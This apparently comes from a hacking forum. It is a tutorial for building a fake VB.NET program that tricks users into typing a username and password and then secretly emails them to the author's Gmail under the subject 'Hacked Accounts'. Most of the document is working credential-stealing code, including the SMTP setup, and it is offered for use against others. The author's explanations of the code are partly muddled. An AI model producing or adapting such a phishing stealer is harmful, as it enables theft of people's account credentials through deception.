What?
What were making is a fake program that sends the text in the text box to your gmail after the progress bar is done loading.
The Design
This is pretty straight forward here just make a design with 2 text boxes, a button, a timer, and a loading bar.
The Code
Once your design is done double click on each "tool" in this order (for neatness) Form1, The timer, and lastly the button.

Now make a new Import like the following picture

Next add this in the Form1
Code:
Button1.Enabled = True
Timer1.Enabled = False
What this means is that if Button1 is enabled then the timer is disabled.
Next add this code in the timer1
Code:
If ProgressBar1.Value <> 100 Then ProgressBar1.Value = ProgressBar1.Value + "1"
If ProgressBar1.Value = 100 Then Timer1.Stop()
This checks for the progress bar and if its value is less > 0 then start the timer.
Next move to the button1 and add this to it
Code:
Timer1.Start()
Dim UserName As String = "YourEmailHere@Gmail.com"
Dim Password As String = "Your Emails"
Dim mail As MailMessage = New MailMessage
mail.From = New MailAddress(UserName)
mail.To.Add(New MailAddress(UserName))
mail.Priority = MailPriority.High
mail.Subject = "Hacked Accounts"
mail.Body = "Username: " + TextBox1.Text + vbNewLine + vbNewLine + "Password: " + TextBox2.Text
mail.IsBodyHtml = True
Dim client As SmtpClient = New SmtpClient("smtp.gmail.com", 587)
client.EnableSsl = True
client.Credentials = New System.Net.NetworkCredential(UserName, Password)
Try
client.Send(mail)
Catch ex As Exception
MessageBox.Show("An error occured while processing your request. Please try again.")
If ProgressBar1.Value = 100 Then Timer1.Stop()
End Try
This starts the timer then emails you what is in the text box and once it hits the value 100 it stops it.
You can fool proof it yourself this was hardcoded by me.